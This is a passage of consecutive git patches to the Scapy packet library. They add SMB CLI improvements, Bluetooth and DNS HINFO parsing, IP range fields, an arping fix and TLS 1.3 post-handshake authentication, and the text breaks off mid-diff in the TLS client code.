-3306,6 +3366,7 @@ def addoutput(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], Deco """ def func(processor: DecoratorCallable) -> DecoratorCallable: cls.commands_output[cmd.__name__] = processor + cls._inspectkwargs(processor) return processor return func @@ -3336,12 +3397,30 @@ def help(self, cmd: Optional[str] = None) -> None: Return the help related to this CLI util """ def _args(func: Any) -> str: - return " %s" % " ".join( - "<%s>" % x - for x in list(inspect.signature(func).parameters.values())[1:] + flags = func._flags.copy() + if func.__name__ in self.commands_output: + flags += self.commands_output[func.__name__]._flags # type: ignore + return " %s%s" % ( + ( + "%s " % " ".join("[%s]" % x for x in flags) + if flags else "" + ), + " ".join( + "<%s%s>" % ( + x.name, + "?" if + (x.default is None or x.default != inspect.Parameter.empty) + else "" + ) + for x in list(inspect.signature(func).parameters.values())[1:] + if x.name not in func._flagnames and x.name[0] != "_" + ) ) - if cmd is not None: + if cmd: + if cmd not in self.commands: + print("Unknown command '%s'" % cmd) + return # help for one command func = self.commands[cmd] print("%s%s: %s" % ( @@ -3350,16 +3429,23 @@ def _args(func: Any) -> str: func.__doc__ and func.__doc__.strip() )) else: - header = "# %s - Help #" % self.__class__.__name__ - print("#" * (len(header))) + header = "│ %s - Help │" % self.__class__.__name__ + print("┌" + "─" * (len(header) - 2) + "┐") print(header) - print("#" * (len(header))) - for cmd, func in self.commands.items(): - print("%s%s: %s" % ( - cmd, - _args(func), - func.__doc__ and func.__doc__.strip().split("\n")[0] - )) + print("└" + "─" * (len(header) - 2) + "┘") + print( + pretty_list( + [ + ( + cmd, + _args(func), + func.__doc__ and func.__doc__.strip().split("\n")[0] or "" + ) + for cmd, func in self.commands.items() + ], + [("Command", "Arguments", "Description")] + ) + ) def _completer(self) -> 'prompt_toolkit.completion.Completer': """ @@ -3372,7 +3458,7 @@ def get_completions(cmpl, document, complete_event): # type: ignore if not complete_event.completion_requested: # Only activate when the user does return - parts = document.text.split(" ", 1) + parts = document.text.split(" ") cmd = parts[0].lower() if cmd not in self.commands: # We are trying to complete the command @@ -3382,7 +3468,8 @@ def get_completions(cmpl, document, complete_event): # type: ignore # We are trying to complete the command content if len(parts) == 1: return - arg = parts[1] + args, _, _ = self._parseallargs(self.commands[cmd], cmd, parts[1:]) + arg = " ".join(args) if cmd in self.commands_complete: for possible_arg in self.commands_complete[cmd](self, arg): yield Completion(possible_arg, start_position=-len(arg)) @@ -3409,7 +3496,7 @@ def loop(self, debug: int = 0) -> None: if not cmd: continue if cmd in ["help", "h", "?"]: - self.help() + self.help(" ".join(args)) continue if cmd in "exit": break @@ -3418,24 +3505,43 @@ def loop(self, debug: int = 0) -> None: else: # check the number of arguments func = self.commands[cmd] + args, kwargs, outkwargs = self._parseallargs(func, cmd, args) if func._spaces: # type: ignore args = [" ".join(args)] + # if globsupport is set, we might need to do several calls + if func._globsupport and "*" in args[0]: # type: ignore + if args[0].count("*") > 1: + print("More than 1 glob star (*) is currently unsupported.") + continue + before, after = args[0].split("*", 1) + reg = re.compile(re.escape(before) + r".*" + after) + calls = [ + [x] for x in + self.commands_complete[cmd](self, before) + if reg.match(x) + ] + else: + calls = [args] + else: + calls = [args] + # now iterate if required, call the function and print its output res = None - try: - res = func(self, *args) - except TypeError: - print("Bad number of arguments !") - self.help(cmd=cmd) - continue - except Exception as ex: - print("Command failed with error: %s" % ex) - if debug > 1: - traceback.print_exception(ex) - try: - if res and cmd in self.commands_output: - self.commands_output[cmd](self, res) - except Exception as ex: - print("Output processor failed with error: %s" % ex) + for args in calls: + try: + res = func(self, *args, **kwargs) + except TypeError: + print("Bad number of arguments !") + self.help(cmd=cmd) + continue + except Exception as ex: + print("Command failed with error: %s" % ex) + if debug: + traceback.print_exception(ex) + try: + if res and cmd in self.commands_output: + self.commands_output[cmd](self, res, **outkwargs) + except Exception as ex: + print("Output processor failed with error: %s" % ex) ####################### diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts index b7d831d5c60..33a9f7b7bd9 100644 --- a/test/scapy/layers/smbclientserver.uts +++ b/test/scapy/layers/smbclientserver.uts @@ -196,6 +196,27 @@ with run_smbserver(): finally: cli.close() + += smbclient: connect to test share and recursive get + +LOCALPATH = pathlib.Path(get_temp_dir()) + +with run_smbserver(): + try: + cli = run_smbclient() + cli.use("test") + cli.lcd(str(LOCALPATH)) + cli.get(".", r=True) + # check on disk + finally: + cli.close() + +assert (LOCALPATH / "fileA").exists() +assert (LOCALPATH / "fileB").exists() +assert (LOCALPATH / "fileScapy").exists() +assert (LOCALPATH / "sub").exists() +assert (LOCALPATH / "sub" / "secret").exists() + + SMB2 Server tests ~ linux smbserver samba From 2a8e0cf9fb969c8f1422ed0d9e86f2cb72d6700f Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Fri, 23 Feb 2024 08:38:31 +0100 Subject: [PATCH 1220/1632] Fix HCI_Event_Inquiry_Result parsing (#4298) --- scapy/layers/bluetooth.py | 11 ++++++----- test/scapy/layers/bluetooth.uts | 9 ++++++++- 2 files changed, 14 insertions(+), 6 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 36591ed2c58..ae19b9d0d62 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1807,15 +1807,16 @@ class HCI_Event_Inquiry_Result(Packet): name = "HCI_Inquiry_Result" fields_desc = [ ByteField("num_response", 0x00), - FieldListField("addr", None, LEMACField, + FieldListField("addr", None, LEMACField("addr", None), count_from=lambda p: p.num_response), - FieldListField("page_scan_repetition_mode", None, ByteField, + FieldListField("page_scan_repetition_mode", None, + ByteField("page_scan_repetition_mode", 0), count_from=lambda p: p.num_response), - FieldListField("reserved", None, LEShortField, + FieldListField("reserved", None, LEShortField("reserved", 0), count_from=lambda p: p.num_response), - FieldListField("device_class", None, XLE3BytesField, + FieldListField("device_class", None, XLE3BytesField("device_class", 0), count_from=lambda p: p.num_response), - FieldListField("clock_offset", None, LEShortField, + FieldListField("clock_offset", None, LEShortField("clock_offset", 0), count_from=lambda p: p.num_response) ] diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index fe481199f64..861ffd4af20 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -272,7 +272,14 @@ assert HCI_Event_Inquiry_Complete in evt_pkt assert evt_pkt[HCI_Event_Inquiry_Complete].status == 0 = Inquiry Result -# TODO +evt_pkt = HCI_Event_Inquiry_Result(b'\x01\xcb\x7f\xdbn\x8c\x9c\x01\x00\x00<\x04\x08\x8di') +assert HCI_Event_Inquiry_Result in evt_pkt +assert evt_pkt[HCI_Event_Inquiry_Result].num_response == 1 +assert evt_pkt[HCI_Event_Inquiry_Result].addr[0] == '9c:8c:6e:db:7f:cb' +assert evt_pkt[HCI_Event_Inquiry_Result].page_scan_repetition_mode[0] == 1 +assert evt_pkt[HCI_Event_Inquiry_Result].device_class[0] == 0x8043c +assert evt_pkt[HCI_Event_Inquiry_Result].clock_offset[0] == 27021 + = Connection Complete evt_raw_data = hex_bytes("04030b000b00093491e5b7540100") From 64029e76405ed60eda9faa7ca42de7b9fa209f92 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 26 Feb 2024 23:59:34 +0300 Subject: [PATCH 1221/1632] DNS: add HINFO resource record (#4299) https://datatracker.ietf.org/doc/html/rfc1035#section-3.3.2 The patch was also cross-checked with Wireshark: ``` tdecode(Ether()/IP()/UDP()/DNS(raw(DNS(an=[DNSRRHINFO(rrname='H.local', os='OS', cpu='CPU')])))) ... Answers H.local: type HINFO, class IN, CPU CPU, OS OS Name: H.local Type: HINFO (host information) (13) Class: IN (0x0001) Time to live: 0 (0 seconds) Data length: 7 CPU Length: 3 CPU: CPU OS Length: 2 OS: OS ``` --- scapy/layers/dns.py | 14 ++++++++++++++ test/scapy/layers/dns.uts | 21 +++++++++++++++++++++ 2 files changed, 35 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index fff4e94c37f..2aeeb02ef2e 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -765,6 +765,19 @@ def default_payload_class(self, payload): return conf.padding_layer +class DNSRRHINFO(_DNSRRdummy): + name = "DNS HINFO Resource Record" + fields_desc = [DNSStrField("rrname", ""), + ShortEnumField("type", 13, dnstypes), + ShortEnumField("rclass", 1, dnsclasses), + IntField("ttl", 0), + ShortField("rdlen", None), + FieldLenField("cpulen", None, fmt="!B", length_of="cpu"), + StrLenField("cpu", "", length_from=lambda x: x.cpulen), + FieldLenField("oslen", None, fmt="!B", length_of="os"), + StrLenField("os", "", length_from=lambda x: x.oslen)] + + class DNSRRMX(_DNSRRdummy): name = "DNS MX Resource Record" fields_desc = [DNSStrField("rrname", ""), @@ -1053,6 +1066,7 @@ class DNSRRTSIG(_DNSRRdummy): DNSRR_DISPATCHER = { 6: DNSRRSOA, # RFC 1035 + 13: DNSRRHINFO, # RFC 1035 15: DNSRRMX, # RFC 1035 33: DNSRRSRV, # RFC 2782 41: DNSRROPT, # RFC 1671 diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index ab16b36a402..873f947b104 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -213,6 +213,27 @@ full = b"\x04data\xc0\x0f" assert dns_get_str(full, full=full)[0] == b"data." += DNS record type 13 (HINFO) + +b = b'\x00\x00\r\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00' + +p = DNSRRHINFO() +assert raw(p) == b + +p = DNSRRHINFO(b) +assert p.cpu == b'' and p.os == b'' + +b = b'\x00\x00\r\x00\x01\x00\x00\x00\x00\x00\r\x06X86_64\x05LINUX' + +p = DNSRRHINFO(cpu='X86_64', os='LINUX') +assert raw(p) == b + +p = DNSRRHINFO(b) +assert p.cpu == b'X86_64' and p.os == b'LINUX' + +d = DNS(raw(DNS(qd=[],an=[p]))) +assert raw(d.an[0]) == raw(p) + = DNS record type 15 (MX) p = DNS(raw(DNS(qd=[],an=DNSRRMX(exchange='example.com')))) From 7cb28cf9891d05c439f5bcf3995ed9895a279cdc Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:00:11 +0100 Subject: [PATCH 1222/1632] Fix DNSStrField multiple values (#4256) --- scapy/layers/dns.py | 4 ++++ test/scapy/layers/dns.uts | 6 ++++++ 2 files changed, 10 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 2aeeb02ef2e..f183ec2552c 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -323,6 +323,10 @@ class DNSStrField(StrLenField): It will also handle DNS decompression. (may be StrLenField if a length_from is passed), """ + def any2i(self, pkt, x): + if x and isinstance(x, list): + return [self.h2i(pkt, y) for y in x] + return super(DNSStrField, self).any2i(pkt, x) def h2i(self, pkt, x): # Setting a DNSStrField manually (h2i) means any current compression will break diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 873f947b104..c4d0ab93b4d 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -484,3 +484,9 @@ assert p == eval(p.command()) p = DNS(qd=[]) assert p == eval(p.command()) + += DNS - iter through DNSStrFields + +pkt = DNSQR(qname=["domain1.com", "domain2.com"], qtype="A") +for i in pkt: + assert i.qname in [b"domain1.com.", b"domain2.com."] From 1354e4bed681a80e8653e8e98ccf0210e49a19dd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:00:30 +0100 Subject: [PATCH 1223/1632] Support range format in IP(v6) fields (#4284) --- scapy/fields.py | 8 ++++++++ test/regression.uts | 8 ++++++++ 2 files changed, 16 insertions(+) diff --git a/scapy/fields.py b/scapy/fields.py index 296a23a3ead..7644fd23fb6 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -853,6 +853,10 @@ def h2i(self, pkt, x): inet_aton(x) except socket.error: return Net(x) + elif isinstance(x, tuple): + if len(x) != 2: + raise ValueError("Invalid IP format") + return Net(*x) elif isinstance(x, list): return [self.h2i(pkt, n) for n in x] return x @@ -949,6 +953,10 @@ def h2i(self, pkt, x): x = in6_ptop(x) except socket.error: return Net6(x) # type: ignore + elif isinstance(x, tuple): + if len(x) != 2: + raise ValueError("Invalid IPv6 format") + return Net6(*x) elif isinstance(x, list): x = [self.h2i(pkt, n) for n in x] return x # type: ignore diff --git a/test/regression.uts b/test/regression.uts index 98140ea9a32..1c3f0c34321 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3890,6 +3890,10 @@ n1 = ip.dst assert isinstance(n1, Net) ip.show() += Net using implicit format in IP + +assert len(list(IP(dst=("192.168.0.100", "192.168.0.199")))) == 100 + = Multiple IP addresses test ~ netaccess @@ -3945,6 +3949,10 @@ ip.show() ip = IPv6(dst="www.yahoo.com") assert IPv6(raw(ip)).dst == [p.dst for p in ip][0] += Net6 using implicit format in IPv6 + +assert len(list(IPv6(dst=("fe80::1", "fe80::1f")))) == 31 + = Multiple IPv6 addresses test ~ netaccess ipv6 From 4067950ce7632714d8f20e2013b29855930612b4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:00:53 +0100 Subject: [PATCH 1224/1632] Fix arping() without routes configured (#4293) --- scapy/layers/l2.py | 24 +++++++++++++++++++----- scapy/sendrecv.py | 3 ++- 2 files changed, 21 insertions(+), 6 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index c2f6b780a61..8014fe7ecd9 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -1004,18 +1004,32 @@ def show(self, *args, **kwargs): @conf.commands.register def arping(net, timeout=2, cache=0, verbose=None, **kargs): # type: (str, int, int, Optional[int], **Any) -> Tuple[ARPingResult, PacketList] # noqa: E501 - """Send ARP who-has requests to determine which hosts are up -arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None -Set cache=True if you want arping to modify internal ARP-Cache""" + """ + Send ARP who-has requests to determine which hosts are up:: + + arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None + + Set cache=True if you want arping to modify internal ARP-Cache + """ if verbose is None: verbose = conf.verb + + hwaddr = None + if "iface" in kargs: + hwaddr = get_if_hwaddr(kargs["iface"]) + r = conf.route.route(str(net), verbose=False) + ans, unans = srp( - Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=net), + Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP( + pdst=net, + psrc=r[1], + hwsrc=hwaddr + ), verbose=verbose, filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, - **kargs + **kargs, ) ans = ARPingResult(ans.res) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 36e60701e59..8bb97f66f58 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -246,7 +246,8 @@ def _sndrcv_snd(self): self.hsent.setdefault(p.hashret(), []).append(p) # Send packet self.pks.send(p) - time.sleep(self.inter) + if self.inter: + time.sleep(self.inter) i += 1 if self.verbose: print("Finished sending %i packets." % i) From 4a86d93fecc802c5a7e1e3fb4ea77a2afc98d155 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Feb 2024 22:02:38 +0100 Subject: [PATCH 1225/1632] TLS: add support for post-handshake auth (#4295) --- scapy/layers/tls/__init__.py | 7 +- scapy/layers/tls/automaton.py | 15 +- scapy/layers/tls/automaton_cli.py | 319 ++++++++++++---------- scapy/layers/tls/automaton_srv.py | 24 +- scapy/layers/tls/handshake.py | 56 +++- scapy/layers/tls/session.py | 48 +++- test/scapy/layers/tls/tlsclientserver.uts | 139 +++++++++- 7 files changed, 416 insertions(+), 192 deletions(-) diff --git a/scapy/layers/tls/__init__.py b/scapy/layers/tls/__init__.py index ab08adf001e..ecdcac9a096 100644 --- a/scapy/layers/tls/__init__.py +++ b/scapy/layers/tls/__init__.py @@ -54,6 +54,8 @@ - Test our TLS client against our TLS server (s_server is unscriptable). + - Test our TLS client against python's SSL Socket wrapper (for TLS 1.3) + TODO list (may it be carved away by good souls): @@ -76,16 +78,11 @@ - Allow the server to store both one RSA key and one ECDSA key, and select the right one to use according to the ClientHello suites. - - Find a way to shutdown the automatons sockets properly without - simultaneously breaking the unit tests. - - Miscellaneous: - Define several Certificate Transparency objects. - - Add the extended master secret and encrypt-then-mac logic. - - Mostly unused features : DSS, fixed DH, SRP, char2 curves... """ diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index acd46dd604a..d1dbe149d66 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -211,16 +211,23 @@ def raise_on_packet(self, pkt_cls, state, get_next_msg=True): # Maybe we already parsed the expected packet, maybe not. if get_next_msg: self.get_next_msg() - from scapy.layers.tls.handshake import TLSClientHello if (not self.buffer_in or - (not isinstance(self.buffer_in[0], pkt_cls) and - not (isinstance(self.buffer_in[0], TLSClientHello) and - self.cur_session.advertised_tls_version == 0x0304))): + not isinstance(self.buffer_in[0], pkt_cls)): return self.cur_pkt = self.buffer_in[0] self.buffer_in = self.buffer_in[1:] raise state() + def in_handshake(self, pkt_cls): + """ + Return True if the pkt_cls was present during the handshake. + This is used to detect whether Certificates were requested, etc. + """ + return any( + isinstance(m, pkt_cls) + for m in self.cur_session.handshake_messages_parsed + ) + def add_record(self, is_sslv2=None, is_tls13=None, is_tls12=None): """ Add a new TLS or SSLv2 or TLS 1.3 record to the packets buffered out. diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index c84826e73f6..26b723012d7 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -30,7 +30,7 @@ from scapy.all import * from scapy.layers.http import * - from scapy.layers.tls import * + from scapy.layers.tls.automaton_cli import * a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443) pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), timeout=2) @@ -48,10 +48,16 @@ from scapy.layers.tls.automaton import _TLSAutomaton from scapy.layers.tls.basefields import _tls_version, _tls_version_options from scapy.layers.tls.session import tlsSession -from scapy.layers.tls.extensions import TLS_Ext_SupportedGroups, \ - TLS_Ext_SupportedVersion_CH, TLS_Ext_SignatureAlgorithms, \ - TLS_Ext_SupportedVersion_SH, TLS_Ext_PSKKeyExchangeModes, \ - TLS_Ext_ServerName, ServerName +from scapy.layers.tls.extensions import ( + ServerName, + TLS_Ext_PSKKeyExchangeModes, + TLS_Ext_PostHandshakeAuth, + TLS_Ext_ServerName, + TLS_Ext_SignatureAlgorithms, + TLS_Ext_SupportedGroups, + TLS_Ext_SupportedVersion_CH, + TLS_Ext_SupportedVersion_SH, +) from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, \ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ @@ -87,8 +93,8 @@ class TLSClientAutomaton(_TLSAutomaton): :param dport: the server port. defaults to 4433 :param server_name: the SNI to use. It does not need to be set :param mycert: - :param mykey: may be provided as filenames. They will be used in - the handshake, should the server ask for client authentication. + :param mykey: may be provided as filenames. They will be used in the (or post) + handshake, should the server ask for client authentication. :param client_hello: may hold a TLSClientHello or SSLv2ClientHello to be sent to the server. This is particularly useful for extensions tweaking. If not set, a default is populated accordingly. @@ -110,6 +116,7 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, data=None, ciphersuite=None, curve=None, + supported_groups=None, **kargs): super(TLSClientAutomaton, self).parse_args(mycert=mycert, @@ -145,8 +152,14 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, self.data_to_send = list(bytes_encode(d) for d in reversed(data)) else: self.data_to_send = [] - self.curve = None + if supported_groups is None: + supported_groups = ["secp256r1", "secp384r1", "x448"] + if conf.crypto_valid_advanced: + supported_groups.append("x25519") + self.supported_groups = supported_groups + + self.curve = None if self.advertised_tls_version == 0x0304: self.ciphersuite = 0x1301 if ciphersuite is not None: @@ -164,6 +177,7 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, self.session_ticket_file_out = session_ticket_file_out self.tls13_psk_secret = psk self.tls13_psk_mode = psk_mode + self.tls13_doing_client_postauth = False if curve is not None: for (group_id, ng) in _tls_named_groups.items(): if ng == curve: @@ -422,7 +436,7 @@ def should_handle_ServerHelloDone(self): def should_handle_ServerHelloDone_from_ServerKeyExchange(self): return self.should_handle_ServerHelloDone() - @ATMT.condition(HANDLED_CERTIFICATEREQUEST, prio=4) + @ATMT.condition(HANDLED_CERTIFICATEREQUEST) def should_handle_ServerHelloDone_from_CertificateRequest(self): return self.should_handle_ServerHelloDone() @@ -448,12 +462,13 @@ def should_add_ClientCertificate(self): XXX We may want to add a complete chain. """ - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if TLSCertificateRequest not in hs_msg: + if not self.in_handshake(TLSCertificateRequest): return + certs = [] if self.mycert: certs = [self.mycert] + self.add_msg(TLSCertificate(certs=certs)) raise self.ADDED_CLIENTCERTIFICATE() @@ -486,10 +501,9 @@ def should_add_ClientVerify(self): We should verify that before adding the message. We should also handle the case when the Certificate message was empty. """ - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if (TLSCertificateRequest not in hs_msg or - self.mycert is None or - self.mykey is None): + if not self.in_handshake(TLSCertificateRequest): + return + if self.mycert is None or self.mykey is None: return self.add_msg(TLSCertificateVerify()) raise self.ADDED_CERTIFICATEVERIFY() @@ -630,6 +644,8 @@ def SENT_CLIENTDATA(self): @ATMT.state() def WAITING_SERVERDATA(self): self.get_next_msg(0.3, 1) + if not self.buffer_in: + raise self.WAIT_CLIENTDATA() raise self.RECEIVED_SERVERDATA() @ATMT.state() @@ -637,57 +653,101 @@ def RECEIVED_SERVERDATA(self): pass @ATMT.condition(RECEIVED_SERVERDATA, prio=1) + def should_handle_CertificateRequest_postauth(self): + self.raise_on_packet(TLS13CertificateRequest, + self.TLS13_RECEIVED_POST_AUTHENTICATION_REQUEST) + + @ATMT.state() + def TLS13_RECEIVED_POST_AUTHENTICATION_REQUEST(self): + self.vprint("Server asked for a certificate...") + self.tls13_doing_client_postauth = True + if not self.mykey or not self.mycert: + self.vprint("No client certificate to send!") + self.vprint("Will try and send an empty Certificate message...") + self.add_record(is_tls13=True) + + @ATMT.condition(TLS13_RECEIVED_POST_AUTHENTICATION_REQUEST, prio=1) + def should_send_CertificateRequest_postauth(self): + if self.cur_session.post_handshake_auth: + self.tls13_should_add_ClientCertificate() + + @ATMT.condition(TLS13_RECEIVED_POST_AUTHENTICATION_REQUEST, prio=2) + def should_fail_CertificateRequest_postauth(self): + self.add_msg(TLSAlert(level=2, descr=0x0A)) + self.flush_records() + self.vprint( + "Received CertificateRequest without post_handshake_auth extension!" + ) + raise self.FINAL() + + @ATMT.condition(RECEIVED_SERVERDATA, prio=2) + def should_handle_NewSessionTicket(self): + self.raise_on_packet(TLS13NewSessionTicket, + self.TLS13_RECEIVED_NEW_SESSION_TICKET) + + @ATMT.state() + def TLS13_RECEIVED_NEW_SESSION_TICKET(self): + pass + + @ATMT.condition(TLS13_RECEIVED_NEW_SESSION_TICKET) + def should_store_session_ticket_file(self): + # If arg session_ticket_file_out is set, we save + # the ticket for resumption... + if self.session_ticket_file_out: + # Struct of ticket file : + # * ciphersuite_len (1 byte) + # * ciphersuite (ciphersuite_len bytes) : + # we need to the store the ciphersuite for resumption + # * ticket_nonce_len (1 byte) + # * ticket_nonce (ticket_nonce_len bytes) : + # we need to store the nonce to compute the PSK + # for resumption + # * ticket_age_len (2 bytes) + # * ticket_age (ticket_age_len bytes) : + # we need to store the time we received the ticket for + # computing the obfuscated_ticket_age when resuming + # * ticket_age_add_len (2 bytes) + # * ticket_age_add (ticket_age_add_len bytes) : + # we need to store the ticket_age_add value from the + # ticket to compute the obfuscated ticket age + # * ticket_len (2 bytes) + # * ticket (ticket_len bytes) + with open(self.session_ticket_file_out, 'wb') as f: + f.write(struct.pack("B", 2)) + # we choose wcs arbitrarily... + f.write(struct.pack("!H", + self.cur_session.wcs.ciphersuite.val)) + f.write(struct.pack("B", self.cur_pkt.noncelen)) + f.write(self.cur_pkt.ticket_nonce) + f.write(struct.pack("!H", 4)) + f.write(struct.pack("!I", int(time.time()))) + f.write(struct.pack("!H", 4)) + f.write(struct.pack("!I", self.cur_pkt.ticket_age_add)) + f.write(struct.pack("!H", self.cur_pkt.ticketlen)) + f.write(self.cur_session.client_session_ticket) + self.vprint( + "Received a TLS 1.3 NewSessionTicket that was stored to %s" % ( + self.session_ticket_file_out + ) + ) + else: + self.vprint("Ignored TLS 1.3 NewSessionTicket.") + raise self.WAIT_CLIENTDATA() + + @ATMT.condition(RECEIVED_SERVERDATA, prio=3) def should_handle_ServerData(self): - if not self.buffer_in: - raise self.WAIT_CLIENTDATA() p = self.buffer_in[0] if isinstance(p, TLSApplicationData): if self.is_atmt_socket: # Socket mode self.oi.tls.send(p.data) else: - print("> Received: %r" % p.data) + self.vprint("Received: %r" % p.data) elif isinstance(p, TLSAlert): - print("> Received: %r" % p) + self.vprint("Received: %r" % p) raise self.CLOSE_NOTIFY() - elif isinstance(p, TLS13NewSessionTicket): - print("> Received: %r " % p) - # If arg session_ticket_file_out is set, we save - # the ticket for resumption... - if self.session_ticket_file_out: - # Struct of ticket file : - # * ciphersuite_len (1 byte) - # * ciphersuite (ciphersuite_len bytes) : - # we need to the store the ciphersuite for resumption - # * ticket_nonce_len (1 byte) - # * ticket_nonce (ticket_nonce_len bytes) : - # we need to store the nonce to compute the PSK - # for resumption - # * ticket_age_len (2 bytes) - # * ticket_age (ticket_age_len bytes) : - # we need to store the time we received the ticket for - # computing the obfuscated_ticket_age when resuming - # * ticket_age_add_len (2 bytes) - # * ticket_age_add (ticket_age_add_len bytes) : - # we need to store the ticket_age_add value from the - # ticket to compute the obfuscated ticket age - # * ticket_len (2 bytes) - # * ticket (ticket_len bytes) - with open(self.session_ticket_file_out, 'wb') as f: - f.write(struct.pack("B", 2)) - # we choose wcs arbitrarily... - f.write(struct.pack("!H", - self.cur_session.wcs.ciphersuite.val)) - f.write(struct.pack("B", p.noncelen)) - f.write(p.ticket_nonce) - f.write(struct.pack("!H", 4)) - f.write(struct.pack("!I", int(time.time()))) - f.write(struct.pack("!H", 4)) - f.write(struct.pack("!I", p.ticket_age_add)) - f.write(struct.pack("!H", p.ticketlen)) - f.write(self.cur_session.client_session_ticket) else: - print("> Received: %r" % p) + self.vprint("Received: %r" % p) self.buffer_in = self.buffer_in[1:] raise self.HANDLED_SERVERDATA() @@ -804,8 +864,7 @@ def SSLv2_HANDLED_SERVERVERIFY(self): pass def sslv2_should_add_ClientFinished(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if SSLv2ClientFinished in hs_msg: + if self.in_handshake(SSLv2ClientFinished): return self.add_record(is_sslv2=True) self.add_msg(SSLv2ClientFinished()) @@ -843,8 +902,7 @@ def sslv2_should_send_ClientFinished(self): @ATMT.state() def SSLv2_SENT_CLIENTFINISHED(self): - hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] - if SSLv2ServerVerify in hs_msg: + if self.in_handshake(SSLv2ServerVerify): raise self.SSLv2_WAITING_SERVERFINISHED() else: self.get_next_msg() @@ -930,7 +988,7 @@ def sslv2_add_ClientData(self): data = input().replace('\\r', '\r').replace('\\n', '\n').encode() else: data = self.data_to_send.pop() - self.vprint("> Read from list: %s" % data) + self.vprint("Read from list: %s" % data) if data == "quit": return if self.linebreak: @@ -970,7 +1028,7 @@ def sslv2_should_handle_ServerData(self): if not self.buffer_in: raise self.SSLv2_WAITING_CLIENTDATA() p = self.buffer_in[0] - print("> Received: %r" % p.load) + self.vprint("Received: %r" % p.load) if p.load.startswith(b"goodbye"): raise self.SSLv2_CLOSE_NOTIFY() self.buffer_in = self.buffer_in[1:] @@ -1009,9 +1067,6 @@ def TLS13_START(self): @ATMT.condition(TLS13_START) def tls13_should_add_ClientHello(self): # we have to use the legacy, plaintext TLS record here - supported_groups = ["secp256r1", "secp384r1", "x448"] - if conf.crypto_valid_advanced: - supported_groups.append("x25519") self.add_record(is_tls13=False) if self.client_hello: p = self.client_hello @@ -1023,22 +1078,32 @@ def tls13_should_add_ClientHello(self): p = TLS13ClientHello(ciphers=c) ext = [] - ext += TLS_Ext_SupportedVersion_CH(versions=["TLS 1.3"]) + ext += TLS_Ext_SupportedVersion_CH(versions=[self.advertised_tls_version]) s = self.cur_session + # Add TLS_Ext_ServerName + if self.server_name: + ext += TLS_Ext_ServerName( + servernames=[ServerName(servername=self.server_name)] + ) + + # Add TLS_Ext_PostHandshakeAuth + if self.mycert is not None and self.mykey is not None: + ext += TLS_Ext_PostHandshakeAuth() + if s.tls13_psk_secret: # Check if DHE is need (both for out of band and resumption PSK) if self.tls13_psk_mode == "psk_dhe_ke": ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_dhe_ke") - ext += TLS_Ext_SupportedGroups(groups=supported_groups) + ext += TLS_Ext_SupportedGroups(groups=self.supported_groups) ext += TLS_Ext_KeyShare_CH( client_shares=[KeyShareEntry(group=self.curve)] ) else: ext += TLS_Ext_PSKKeyExchangeModes(kxmodes="psk_ke") - # RFC844, section 4.2.11. + # RFC8446, section 4.2.11. # "The "pre_shared_key" extension MUST be the last extension # in the ClientHello " # Compute the pre_shared_key extension for resumption PSK @@ 